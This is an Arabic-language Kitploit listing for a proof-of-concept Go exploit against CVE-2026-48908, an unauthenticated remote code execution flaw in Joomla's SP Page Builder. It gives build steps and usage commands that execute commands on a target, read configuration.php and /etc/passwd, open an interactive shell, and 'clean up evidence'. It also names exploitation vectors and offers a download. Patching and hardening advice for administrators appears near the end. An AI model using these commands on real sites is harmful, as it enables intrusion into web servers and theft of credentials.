Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48908-SP-Page-Builder-Joomla — CVE-2026-48908 - SP Page Builder Joomla RCE بدون مصادقة | Kitploit
أدوات/GitHubGitHub/gagaltotal/cve-2026-48908-sp-page-builder-joomla
تحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubgagaltotal/cve-2026-48908-sp-page-builder-joomla

CVE-2026-48908-SP-Page-Builder-Joomla

CVE-2026-48908 - SP Page Builder Joomla RCE بدون مصادقة

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

CVE-2026-48908: ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في SP Page Builder لـ Joomla

استغلال إثبات المفهوم لثغرة CVE-2026-48908، وهي ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في مكوّن SP Page Builder لـ Joomla.

نظرة عامة على الثغرة

CVE-2026-48908 هي ثغرة أمنية حرجة تسمح للمهاجمين غير المصادق عليهم بتنفيذ أكواد عشوائية على تثبيتات Joomla المعرضة للخطر من خلال المعالجة غير الصحيحة لاستخراج ملفات ZIP في مكوّن SP Page Builder.

التفاصيل الفنية

  • معرّف CVE: CVE-2026-48908
  • المكوّن: com_sppagebuilder
  • الإصدارات المعرضة للخطر: <= 6.6.1
  • الإصدار المُصحَّح: 6.6.2
  • متجه الهجوم: عبر الشبكة، بدون مصادقة
  • درجة CVSS: حرجة
  • نوع الثغرة: رفع ملفات عشوائي / تنفيذ أوامر عبر استخراج ZIP
  • نقطة الهجوم: index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon

السبب الجذري

توجد الثغرة في وظيفة رفع الأصول (asset upload) حيث يقوم التطبيق بالتحقق والاستخراج بشكل غير صحيح لملفات ZIP التي تحتوي على أصول الأيقونات. يمكن للمهاجم إنشاء ملف ZIP خبيث يحمل حمولات PHP يتم استخراجها إلى الدليل المتاح عبر الويب، مما يتيح تنفيذ الأوامر عن بُعد.

المتطلبات

  • Go 1.26.4 أو أحدث
  • وصول عبر الشبكة إلى تثبيت Joomla المستهدف
  • عنوان URL صالح للهدف

التبعيات

  • golang.org/x/term - أدوات طرفية لإدخال كلمات المرور بشكل آمن

التثبيت

من المصدر

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go

الحزمة الثنائية المجمّعة مسبقًا

تتوفر الحزم الثنائية المجمّعة في قسم الإصدارات (releases).

الاستخدام

Screen Capture

تنفيذ الأوامر الأساسي

Screen Capture

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "whoami"

شل تفاعلي

root@kitploit:~
./poc_tot -target http://target-site.com -shell

تقييم الثغرة

root@kitploit:~
./poc_tot -target http://target-site.com -check

التنظيف

root@kitploit:~
./poc_tot -target http://target-site.com -cleanup

استخدام رمز مخصص (إن توفر)

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"

خيارات سطر الأوامر

root@kitploit:~
-target string
    Target URL of vulnerable Joomla installation (required)
    Example: http://target.com or https://target.com

-cmd string
    System command to execute on target
    Example: "cat /etc/passwd"

-shell
    Launch interactive shell on target (requires successful exploitation)

-check
    Check if target is vulnerable without attempting exploitation

-cleanup
    Remove uploaded shell and artifacts from target

-token string
    CSRF token for exploitation (optional, auto-detected if not provided)

طرق الاستغلال

تدعم الأداة عدة متجهات للاستغلال:

  1. رفع PHP مباشر - يرفع ملفات PHP مباشرة إلى مسارات قابلة للتنفيذ
  2. اجتياز الدلائل - يستخدم اجتياز المسار لتجاوز القيود
  3. التلاعب بالأرشيفات - يُنشئ أرشيفات ZIP خبيثة بحمولات مضمّنة
  4. انتحال الامتداد - يستخدم امتدادات مزدوجة وتباينات في حالة الأحرف

أمثلة

الاستطلاع

root@kitploit:~
./poc_tot -target http://vulnerable.local -check

تنفيذ أمر واحد

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"

استرجاع الملفات الحساسة

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"

وصول تفاعلي

root@kitploit:~
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd

تنظيف الأدلة

root@kitploit:~
./poc_tot -target http://vulnerable.local -cleanup

اعتبارات أمنية

للمسؤولين

إذا كنت تشغّل Joomla مع مكوّن SP Page Builder:

  1. حدّث فورًا: قم بالترقية إلى SP Page Builder 6.6.2 أو أحدث
  2. عطّل المكوّن: إذا لم يكن التحديث الفوري ممكنًا، قم بتعطيل com_sppagebuilder
  3. راقب السجلات: تحقق من سجلات خادم الويب بحثًا عن نشاط مشبوه
  4. قيّد الصلاحيات: تأكد من صلاحيات الملفات المناسبة على أدلة الويب
  5. جدار حماية تطبيقات الويب: انشر قواعد WAF لمنع محاولات الاستغلال

لباحثي الأمن

  • استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك تفويض صريح لاختبارها
  • اختبر في بيئات معزولة أولًا
  • وثّق جميع النتائج بشكل مناسب
  • اتبع ممارسات الإفصاح المسؤول
  • لا تستخدمها للوصول غير المصرح به

إخلاء المسؤولية

تم توفير هذا البرنامج لأغراض تعليمية ولاختبارات أمنية مصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلفون المسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة. يتحمل المستخدمون مسؤولية ضمان حصولهم على التفويض المناسب قبل استخدام هذه الأداة على أي نظام مستهدف.

باستخدامك لهذه الأداة، فإنك تقرّ بما يلي:

  • أنك ستستخدمها فقط على الأنظمة التي تملكها أو لديك تفويض كتابي لاختبارها
  • أنك تتفهم الآثار القانونية وتتحمل المسؤولية الكاملة
  • أن المؤلفين غير مسؤولين عن أي ضرر أو عواقب قانونية
  • أنك ستمتثل لجميع القوانين واللوائح المعمول بها

إشعار قانوني

هذه الأداة مخصصة لأبحاث الأمن الدفاعي واختبارات الاختراق المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر ينتهك قانون الاحتيال وإساءة استخدام الحاسوب (Computer Fraud and Abuse Act) والقوانين المماثلة في الولايات القضائية الأخرى. احرص دائمًا على الحصول على التفويض المناسب كتابيًا قبل إجراء الاختبارات الأمنية.

المراجع

  • المركز الأمني الرسمي لـ Joomla: https://docs.joomla.org/Security_Checklist
  • SP Page Builder: https://www.sp-components.com/
  • تفاصيل CVE-2026-48908: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48908

التخفيف

إجراءات فورية

  1. طبّق التحديث الأمني إلى الإصدار 6.6.2 أو أحدث
  2. إذا لم يتوفر التحديث، قم بتعطيل المكوّن: index.php?option=com_installer&view=manage
  3. افحص سجلات الأخطاء بحثًا عن محاولات الاستغلال
  4. راجع نظام الملفات بحثًا عن ملفات PHP مشبوهة في أدلة الوسائط

الأمن طويل الأمد

  1. حافظ على تحديث Joomla وجميع المكوّنات
  2. نفّذ فحصًا أمنيًا آليًا
  3. استخدم ترويسات الأمان وقواعد WAF
  4. راقب سلامة الملفات
  5. حافظ على نسخ احتياطية منتظمة
  6. طبّق مبدأ الامتياز الأقل

المساهمة

المساهمات في البحث الأمني مرحّب بها. يرجى:

  1. الإبلاغ عن الثغرات بمسؤولية
  2. اتباع نمط الكود الموجود
  3. تضمين توثيق مفصّل
  4. الاختبار الشامل قبل التقديم

المؤلف

GhostGTR666 (Gagaltotal666)

  • GitHub: https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
  • البريد الإلكتروني: تواصل عبر GitHub

سجل التغييرات

الإصدار 1.0.0

  • الإصدار الأولي
  • دعم متجهات استغلال متعددة
  • وظيفة الشل التفاعلي
  • عمليات فحص الثغرات والتنظيف

الدعم

للاستفسارات أو الأسئلة أو المساهمات:

  1. تحقق من المشكلات الموجودة على GitHub
  2. راجع رسائل الأخطاء والسجلات
  3. تأكد من صحة عنوان URL الهدف وإمكانية الوصول إليه
  4. تحقق من التفويض المناسب قبل الاختبار

الترخيص

يتم توفير هذا المشروع كما هو لأغراض البحث الأمني. راجع القوانين المحلية المتعلقة بأدوات الأمن واختبار الاختراق قبل الاستخدام.


آخر تحديث: 2026-06-24

إخلاء المسؤولية: هذه الأداة مخصصة للاختبارات الأمنية المصرح بها فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

تنزيل الأداة